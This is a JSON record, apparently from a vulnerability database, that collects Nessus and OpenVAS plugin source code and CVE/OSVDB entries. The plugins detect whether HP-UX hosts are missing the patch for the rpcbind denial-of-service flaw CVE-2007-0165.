script_id(34316);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37110 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_37110 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37110\", \"PHNE_37568\", \"PHNE_39167\", \"PHNE_41023\", \"PHNE_41973\", \"PHNE_43577\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.KEY-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NISPLUS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-ENG-A-MAN\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-13T09:30:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:hp:hp-ux"], "cvelist": ["CVE-2007-0165"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX running rpcbind. The vulnerability could be remotely exploited to create a Denial of Service (DoS) .", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "f949b37773f6ff7163ecef8f445054ee6930a29159018aa736654e7ad42589b0", "hashmap": [{"hash": "7aa77d624cf2b9a84ca1c279d1032e90", "key": "title"}, {"hash": "85b8a83a30aa02cc3e2d54ff1f6abd96", "key": "modified"}, {"hash": "f537a8c4c2a2ecce05af223984a006fc", "key": "naslFamily"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "60bc551ca678c042256508c5a0f46689", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "8a92e595513c803094077f6b08916ff2", "key": "sourceData"}, {"hash": "395c550ad1f388a6e1339458c69517e3", "key": "cvelist"}, {"hash": "68d317a66c0c547bc015c7bcb716d830", "key": "references"}, {"hash": "6336146e54671bcda780588839b91aed", "key": "href"}, {"hash": "afe57d0304e958202be29619fb28e901", "key": "cpe"}, {"hash": "e9a62e5e97870f6018bd05ced73aea75", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "a228636dbac0feaf7beb81daec024801", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=34316", "id": "HPUX_PHNE_37110.NASL", "lastseen": "2017-10-29T13:33:30", "modified": "2015-03-30T00:00:00", "naslFamily": "HP-UX Local Security Checks", "objectVersion": "1.3", "pluginID": "34316", "published": "2008-10-01T00:00:00", "references": ["http://www.nessus.org/u?338fde17"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37110. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34316);\n script_version(\"$Revision: 1.15 $\");\n script_cvs_date(\"$Date: 2015/03/30 13:45:23 $\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_osvdb_id(48454);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37110 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2015 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_37110 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37110\", \"PHNE_37568\", \"PHNE_39167\", \"PHNE_41023\", \"PHNE_41973\", \"PHNE_43577\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.KEY-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NISPLUS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-ENG-A-MAN\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:33:30"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "afe57d0304e958202be29619fb28e901"}, {"key": "cvelist", "hash": "395c550ad1f388a6e1339458c69517e3"}, {"key": "cvss", "hash": "ed3111898fb94205e2b64cefef5a2081"}, {"key": "description", "hash": "50d71ccf3a241901ea1d4e0b1055e304"}, {"key": "href", "hash": "6336146e54671bcda780588839b91aed"}, {"key": "modified", "hash": "f5e850f1985da305c7f9475708cd4d52"}, {"key": "naslFamily", "hash": "f537a8c4c2a2ecce05af223984a006fc"}, {"key": "pluginID", "hash": "60bc551ca678c042256508c5a0f46689"}, {"key": "published", "hash": "e9a62e5e97870f6018bd05ced73aea75"}, {"key": "references", "hash": "68d317a66c0c547bc015c7bcb716d830"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "e839baedc6b140e90f55ca5cb59453c6"}, {"key": "title", "hash": "7aa77d624cf2b9a84ca1c279d1032e90"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "213f5d4591f02f7ede15957daa0a7fe2f07283bb90deae361786e5b022c68026", "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0165"]}, {"type": "exploitdb", "idList": ["EDB-ID:29406"]}, {"type": "osvdb", "idList": ["OSVDB:31576"]}, {"type": "openvas", "idList": ["OPENVAS:835182", "OPENVAS:1361412562310835182"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7047"]}, {"type": "nessus", "idList": ["HPUX_PHNE_36982.NASL", "SOLARIS8_108993.NASL", "SOLARIS8_X86_108994.NASL", "SOLARIS9_X86_113719.NASL", "SOLARIS9_113319.NASL"]}], "modified": "2019-01-16T20:08:36"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37110. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34316);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/07/12 19:01:15\");\n\n script_cve_id(\"CVE-2007-0165\");\n script_bugtraq_id(21964);\n script_xref(name:\"HP\", value:\"emr_na-c01556916\");\n script_xref(name:\"HP\", value:\"HPSBUX02370\");\n script_xref(name:\"HP\", value:\"SSRT071459\");\n\n script_name(english:\"HP-UX PHNE_37110 : HP-UX Running rpcbind, Remote Denial of Service (DoS) (HPSBUX02370 SSRT071459 rev.1)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.11 ONC/NFS General Release/Performance Patch : \n\nA potential security vulnerability has been identified with HP-UX\nrunning rpcbind. The vulnerability could be remotely exploited to\ncreate a Denial of Service (DoS) .\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01556916\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?338fde17\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37110 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.11\"))\n{\n exit(0, \"The host is not affected since PHNE_37110 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37110\", \"PHNE_37568\", \"PHNE_39167\", \"PHNE_41023\", \"PHNE_41973\", \"PHNE_43577\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"NFS.KEY-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64ALIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-64SLIB\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-ENG-A-MAN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-KRN\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-PRG\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NFS-SHLIBS\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CLIENT\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NIS-SERVER\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"NFS.NISPLUS-CORE\", version:\"B.11.11\")) flag++;\nif (hpux_check_patch(app:\"OS-Core.CORE-ENG-A-MAN\", version:\"B.11.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:hpux_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "HP-UX Local Security Checks", "pluginID": "34316", "cpe": ["cpe:/o:hp:hp-ux"]}
{"cve": [{"lastseen": "2018-11-01T05:11:28", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in libnsl in Sun Solaris 8 and 9 allows remote attackers to cause a denial of service (crash) via malformed RPC requests that trigger a crash in rpcbind.", "modified": "2018-10-30T12:25:37", "published": "2007-01-09T19:28:00", "id": "CVE-2007-0165", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0165", "title": "CVE-2007-0165", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "description": "## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch to address this vulnerability. For Solaris 8, install patch 108993-65, and Solaris 9, install patch 113319-27.\n## References:\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2007-036.htm)\nSecurity Tracker: 1017492\n[Secunia Advisory ID:23700](https://secuniaresearch.flexerasoftware.com/advisories/23700/)\n[Secunia Advisory ID:24056](https://secuniaresearch.flexerasoftware.com/advisories/24056/)\nOther Advisory URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102713-1\nISS X-Force ID: 31366\nFrSIRT Advisory: ADV-2007-0110\n[CVE-2007-0165](https://vulners.com/cve/CVE-2007-0165)\nBugtraq ID: 21964\n", "modified": "2007-01-09T05:18:43", "published": "2007-01-09T05:18:43", "href": "https://vulners.com/osvdb/OSVDB:31576", "id": "OSVDB:31576", "title": "Solaris libnsl rpcbind Unspecified DoS", "type": "osvdb", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:56:49", "bulletinFamily": "scanner", "description": "Check for the Version of rpcbind", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835182", "id": "OPENVAS:835182", "title": "HP-UX Update for rpcbind HPSBUX02370", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for rpcbind HPSBUX02370\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"rpcbind on\n HP-UX B.11.11 and HP-UX B.11.23 running rpcbind\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n rpcbind. The vulnerability could be remotely exploited to create a Denial of \n Service (DoS) .\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01556916-1\");\n script_id(835182);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02370\");\n script_cve_id(\"CVE-2007-0165\");\n script_name( \"HP-UX Update for rpcbind HPSBUX02370\");\n\n script_summary(\"Check for the Version of rpcbind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-64SLIB\", patch_list:['PHNE_36982'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-SHLIBS\", patch_list:['PHNE_36982'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-64SLIB\", patch_list:['PHNE_37110'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-SHLIBS\", patch_list:['PHNE_37110'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:38", "bulletinFamily": "scanner", "description": "Check for the Version of rpcbind", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835182", "id": "OPENVAS:1361412562310835182", "type": "openvas", "title": "HP-UX Update for rpcbind HPSBUX02370", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for rpcbind HPSBUX02370\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote Denial of Service (DoS)\";\ntag_affected = \"rpcbind on\n HP-UX B.11.11 and HP-UX B.11.23 running rpcbind\";\ntag_insight = \"A potential security vulnerability has been identified with HP-UX running \n rpcbind. The vulnerability could be remotely exploited to create a Denial of \n Service (DoS) .\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01556916-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835182\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02370\");\n script_cve_id(\"CVE-2007-0165\");\n script_name( \"HP-UX Update for rpcbind HPSBUX02370\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of rpcbind\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-64SLIB\", patch_list:['PHNE_36982'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-SHLIBS\", patch_list:['PHNE_36982'], rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-64SLIB\", patch_list:['PHNE_37110'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"NFS.NFS-SHLIBS\", patch_list:['PHNE_37110'], rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:22", "bulletinFamily": "software", "description": "No description provided", 